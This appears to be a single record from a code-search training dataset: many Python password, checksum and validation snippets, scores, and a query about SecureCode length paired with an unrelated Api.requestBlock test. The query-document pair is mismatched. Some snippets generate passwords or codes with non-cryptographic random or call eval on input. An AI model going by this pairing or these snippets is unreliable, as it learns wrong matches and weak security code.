abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ 
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ 
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\\\"#$%&'()*+,-./:;<=>?@[\\\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCD\"\n result = Solution().lengthOfLongestSubstring2(s)\n self.assertEqual(result, 95)", "def FirstPart(): \n return passwordChecker_incorrect(data)", "def is_sedol(value):\n return re.match(r'^[0-9BCDFGHJKLMNPQRSTVWXYZ]{6}\\d$', value)", "def validate_password(password):\n return 
isinstance(password, str) and len(password) >= 8 and \\\n re.search(r'[A-Z]', password) and re.search(r'[0-9]', password)", "def strlen(val): \n return len(val)", "def is_valid(key):\n return key[0:2] == \"MR\" and key[2:].isdigit() and len(key) in [9, 10]", "def check_passcode_required(document_html):\n if \"visitor[passcode]\" in document_html:\n return True\n else:\n return False", "def check_pwd(password: str) -> bool:\n # if len(password) > 0 and password[0].isdigit():\n # upper: List[Any] = [letter for letter in password if letter.isupper()]\n # lower: List[Any] = [letter for letter in password if letter.islower()]\n # return len(upper) > 1 and len(lower) > 0\n # else:\n # return False\n # Professor's solution\n return len(password) >= 4 \\\n and sum([1 for c in password if c.isupper()]) >= 2 \\\n and sum([1 for c in password if c.islower()]) >= 1 \\\n and password[0].isdigit()", "def generate_verification_code(self, size=10, chars=string.digits):\n return \"\".join(random.choice(chars) for _ in range(size))", "def check_secure_val(secure_val):\n val = secure_val.split('|')[0]\n return val and secure_val == make_secure_val(val)", "def check_secure_val(hash_val):\n\n val = hash_val.split('|')[0]\n if hash_val == make_secure_val(val):\n return val", "def check_pwd_policy1(processed):\n policy, letter, pwd = processed\n return pwd.count(letter) in policy", "def test_random_code_generator(self):\n # Produces similar to '8FHGNH'\n code = random_code_generator()\n self.assertEquals(len(code), 6)\n code_2 = random_code_generator()\n if code == code_2:\n self.assertEquals(False)\n # Produces similar to 'CFB-U8X-9KE-TY8':\n code_3 = random_code_generator(12, 4, '-')\n self.assertEquals(len(code_3), 15)\n self.assertEquals(len(code_3.replace('-', '')), 12)\n code_4 = random_code_generator(100, banned_chars='X')\n self.assertEquals(code_4.find('X'), -1)", "def test_valid_password(self):\n pass_field = Field(\"\".join(['x' * (int(self.app.config['MAX_PWD_LEN']))]))\n\n valid_password(None, pass_field)", "def is_valid_password(variable):\n if re.match(r'[A-Za-z0-9@#$%^&+=]{8,}', variable):\n return True\n return False", "def alpha_len(password_length):\r\n while True:\r\n alphabet_length = input('How much alphabets you want in password? 
At least 1 : ')\r\n try:\r\n alphabet_length = int(alphabet_length)\r\n if 1 <= alphabet_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(alphabet_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(alphabet_length))\r\n return alphabet_length", "def generate_password(length=20):\r\n # type: (int) -> str\r\n return ('%0'+str(length)+'x') % random.randrange(16 ** length)", "def test_cpf_has_11_digits(self):\r\n form = self.make_validated_form(cpf='1234')\r\n self.assertFormErrorCode(form, 'cpf', 'length')", "def test_password_strength_validator_length_fail(self):\n with self.assertRaises(ValidationError):\n validate_password_strength('hi')", "def sanetoken(token):\n\t# len(CryptoHelper.longEncode(2**4096)) = 1372\n\tMAX_TOKEN_LEN = 1372\n\treturn len(token) <= MAX_TOKEN_LEN", "def is_valid_payload(p):\n # if the checksum is valid the checksum calculation, without removing the\n # checksum, should be equal to zero\n\n if checksum16(p) == 0:\n return True\n else:\n return False", "def simple_validator(passport):\n if len(passport) == 8:\n return True\n if len(passport) == 7 and \"cid\" not in passport:\n return True\n return False", "def test_long_password():\n expect_error(register, InputError,\n \"abcdef\", \"a\" * (MIN_PASSWORD - 1), \"a\", \"A\", \"a\")", "def _is_valid_key(self, key):\r\n\r\n # Check the length\r\n if len(key) > 250:\r\n return False\r\n\r\n # Check that there are no spaces or control characters\r\n for char in key:\r\n if ord(char) < 33 or ord(char) == 127:\r\n return False\r\n\r\n return True", "def validate(self, data):\n password = data['password']\n if data['password'] == data['password2'] and re.fullmatch(r'[A-Za-z0-9@#$%^&+=]{8,}', password):\n return data\n raise serializers.ValidationError(\"Password should be match and password must have number,special char,1-capital,1-small and min 8 char\")", "def luhn_verifica(ccred):\n \n # Primeiro criamos uma nova cadeia, n, com os digitos do cartao de credito sem o de controle.\n # Usamos a funcao calc_soma para somar os digitos do cartao de acordo com o algoritmo de Luhn e juntamos o digito de controle. Caso este ultimo nao seja um algarismo, chamamos a atencao ao utilizador para o erro.\n # Caso o resto da divisao por 10 seja 0, a funcao devolve o valor logico True. \n \n\n n = ccred[:-1]\n dig_verificacao = ccred[-1]\n \n if '0' <= dig_verificacao <= '9':\n soma = calc_soma(n) + eval(dig_verificacao)\n \n else:\n raise ValueError ('function luhn_verifica() O string recebido apenas pode conter digitos') \n \n return soma % 10 == 0", "def test_right_checksum(self):\n self.assertEqual(utils.checksum('fooo'), 'L')" ]
[ "0.65187556", "0.64862204", "0.64156276", "0.6369722", "0.635985", "0.6273854", "0.6231202", "0.61325234", "0.6130397", "0.6046088", "0.6041387", "0.6014855", "0.59593093", "0.59332305", "0.58832985", "0.587831", "0.5856602", "0.58545417", "0.58352524", "0.5809067", "0.57998765", "0.5772197", "0.5767344", "0.57654417", "0.57615197", "0.5759074", "0.57396555", "0.573709", "0.57274216", "0.57116497", "0.56985754", "0.5694296", "0.56924915", "0.5692205", "0.5687493", "0.56859624", "0.5677893", "0.5669426", "0.5668952", "0.56606585", "0.5612483", "0.56087685", "0.55717874", "0.55513394", "0.5543613", "0.5525207", "0.55226296", "0.5499571", "0.54983306", "0.54941714", "0.54906833", "0.5489176", "0.5483284", "0.5481176", "0.5478031", "0.54753405", "0.5471657", "0.546675", "0.54627883", "0.54573685", "0.5453394", "0.5452467", "0.54523665", "0.5448551", "0.5440116", "0.5428845", "0.54237586", "0.5421163", "0.54198104", "0.5405877", "0.54057515", "0.54057515", "0.5405649", "0.54002357", "0.53969026", "0.5391531", "0.5388647", "0.5385929", "0.5382834", "0.5380212", "0.5380205", "0.5378986", "0.5371827", "0.53687423", "0.53682077", "0.536065", "0.5358565", "0.53540945", "0.5334992", "0.53325593", "0.53321654", "0.53297466", "0.5326117", "0.53111607", "0.5305696", "0.5303853", "0.5297327", "0.5297007", "0.5294556", "0.52939", "0.52909493" ]
0.0
-1
Check length of SecureCode (SecureCode= 123 )
def test_38(self): assert 'True' == Api.requestBlock('test-38')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_valid_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def check_len(password_length, alphabet_length, numb_length, symb_length):\r\n return (symb_length + alphabet_length + numb_length) == password_length", "def test_valid_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def check_length(string):\n if 6 < len(string) < 12:\n return True\n\n print(\"Your password is not between 6 and 12 characters\")\n return False", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def test_invalid_numeric_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == allowed_code_length_values_msg", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def test_invalid_numeric_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == parameter_is_too_long_msg.format('sender_id')", "def __len__(self):\n return len(self.code)", "def test_invalid_nonnumeric_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == invalid_value_msg.format('code_length')", "def is_code_valid_checksum(processed_code):\n\n if processed_code.isnumeric():\n list_of_digits = [int(digit) for digit in processed_code]\n else:\n converted_digits = convert_code_to_decimal(processed_code)\n list_of_digits = [int(digit) for digit in converted_digits]\n\n return sum(list_of_digits) > 0 and get_calculated_checksum(list_of_digits) % 11 == 0", 
"def secure_passphrase(val: str) -> bool:\n if len(val) < 15:\n return False\n if len([v for v in val if v not in string.ascii_letters]) < 5:\n return False\n\n return True", "def test01_password_length(self):\n self.set_complexity(length=13, numeric=0, upper=0, lower=0, special=0)\n\n invalid = (\n \"A\",\n \"Tr0ub4dor&3\",\n \"!!!!!!!!!!!!\",\n \"Password\",\n \"Password123!\",\n \"admin\",\n )\n self.assertPasswordsInvalid(invalid)\n\n valid = (\n \"correcthorsebatterystaple\",\n \"abcdefghijklmopqrstuvwxyz\",\n \"12345678901234567890\",\n \"!!!!!!!!!!!!!\" \"Password123!___\",\n )\n self.set_passwords(valid)", "def __len__(self):\n return self.cli.passwords.len()", "def is_private(code):\n return 4000 <= code <= 4999", "def check_digit(raw_code):\n s = sum(code(char) * 2**index for index, char in enumerate(raw_code))\n return s % 11 % 10", "def pwd_len():\r\n while True:\r\n password_length = input('How much length for password u want ? Minimum length is 6 and Maximum length is 25 : ')\r\n try:\r\n password_length = int(password_length)\r\n if 6 <= password_length <= 25:\r\n break\r\n else:\r\n print('{} is not in range'.format(password_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(password_length))\r\n return password_length", "def is_valid_two_digit_char(code: str) -> bool:\n\n return 10 <= int(code) <= 26", "def validate_authkey(value):\n if not len(value) == 32:\n raise ValidationError(\n 'Value must be a string containing 32 alphanumeric characters')", "def get_code_length(code):\n ignore = [\"{\", \"}\", \"(\", \")\", \";\", \":\"]\n for ig in ignore:\n code = code.replace(ig, \"\")\n return len([e.strip() for e in code.split(\"\\n\") if (not e.strip() == \"\") and (not e.strip() == u\"'\") and (not e.strip() == u\"u'\")])", "def is_reserved(code):\n return 1000 <= code <= 2999", "def checksum(code):\n return sum(code) % 256", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def source_data_key_length_check(source_data_key, algorithm):\n if len(source_data_key.data_key) != algorithm.kdf_input_len:\n raise InvalidDataKeyError(\n \"Invalid Source Data Key length {actual} for algorithm required: {required}\".format(\n actual=len(source_data_key.data_key), required=algorithm.kdf_input_len\n )\n )", "def validate(msg):\n valid = True\n\n if not msg or len(msg) < 4:\n return False, -1, -1\n\n checksum = msg[-1]\n length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n # try:\n # # here works for pyton 3 only\n # length = int.from_bytes(msg[1:3], byteorder='big', signed=False)\n # except Exception:\n # length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n\n validlen = len(msg[3:-1])\n validsum = 0xFF - ((sum(msg[3:-1])) & 0xFF)\n\n # print('length: ' + str(self.length) + '; ' + str(validlen))\n # print('checksum: ' + str(self.checksum) + '; ' + str(validsum))\n\n # check sanity of computed Length and Checksum with the one in the message\n if (checksum != validsum) or (length != validlen):\n valid = False\n\n return valid, length, checksum", "def test_valid_luhn(self):\n assert luhn_checksum(\"79927398713\") == 0", "def calculate_checksum(code):\n\n sum_odd = reduce(sum_chars, code[::2])\n sum_even = reduce(sum_chars, code[1:-1:2])\n check = (sum_even + sum_odd * 3) % 10\n\n if check == 0:\n return 0\n else:\n return 10 - check", "def is_secure(self):\n return (self.nbits % 8 == 0) and (self.nbits >= params.MINIMUM_KEY_SIZE)", 
"def validate_password(data):\n\n if \"password\" not in data:\n return False\n password = data[\"password\"]\n if len(password) < 4 or len(password) > 16:\n return False\n\n return True", "def passWord(pwd):\n pwdLen = len(pwd)\n if pwdLen < 4:\n raise Exception(\"The password is too short.\")\n if pwdLen > 8:\n raise Exception(\"tHE password is too long\")\n else:\n print('the length of the password is correct.')", "def check_valid_fernet(value):\n try:\n decoded = base64.urlsafe_b64decode(value)\n if len(decoded) != 32: return False\n return True\n except binascii.Error:\n return False", "def SecondPart():\n return passwordChecker(data)", "def symbol_len(password_length):\r\n while True:\r\n symb_length = input('How much symbols you want in password? At least 1 : ')\r\n try:\r\n symb_length = int(symb_length)\r\n if 1 <= symb_length <= (password_length - 2):\r\n break\r\n else:\r\n print('{} is not in range'.format(symb_length))\r\n except ValueError:\r\n print('{} is not an integer'.format(symb_length))\r\n return symb_length", "def strlen(val): \n return len(val)", "def check_verify_code(self):\n r = self.session.get(self.check_url)\n s = r.text\n data = json.loads(s[s.index('{'):-1])\n if data.get('codestring'):\n return data.get('codestring', \"\")\n return \"\"", "def check_password_strength():\r\n\r\n password_regex = re.compile(r'''(\r\n (?=.*[A-Z]{2})\r\n (?=.*[a-z]{3})\r\n (?=.*[/!@#$%^&_*+'\\\"-?.:;<>,])\r\n (?=.*[0-9])\r\n .{8,}\r\n )''', re.VERBOSE)\r\n\r\n get_password(password_regex)", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def test_password_strength_validator(self):\n self.assertIsNone(validate_password_strength('abcd123'))", "def test_password_length(self):\n response = self.client().post('/api/v1/auth/signup', data=self.user_data_4)\n self.assertEqual(response.status_code, 400)\n # return result in json format\n result = json.loads(response.data.decode())\n self.assertEqual(\n result[\"message\"], \"Password should not be less than four characters.\")", "def verifyHashcode(digest):\n list_str = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"A\", \"B\", \"C\", \"D\", \"E\", \"F\"]\n list_num = [ 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 , 11 , 12 , 13 , 14 , 15 ]\n \n total = 0\n for i2 in range(len(digest)):\n digest_i = digest[i2]\n #print(\"digest_i =\", digest_i)\n \n for i1 in range(16):\n if digest_i == list_str[i1] and i2 != 0:\n total += list_num[i1]\n #print(\"total =\", total)\n #print(\"list_num[i1] =\", list_num[i1])\n continue\n \n #print(\"--- --- ---\")\n \n #print(\"total =\", total)\n \n checknum = total % 16\n #print(\"checknum =\", checknum)\n \n checkstr = list_str[checknum]\n #print(\"checkstr =\", checkstr)\n \n checkorg = digest[0]\n #print(\"checkorg =\", checkorg)\n \n if checkorg == checkstr:\n isValid = True\n else:\n isValid = False\n \n return isValid", "def mobile_len_validator(mobile):\n if len(mobile) != 13:\n raise ValidationError('Invalid mobile len')", "def test_minlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'postal_code': '9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': 'B-9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': '905'}\n self.assertFalse(val.validate(document))", "def test_invalid_numeric_code_length_format(self, cred, language):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', 
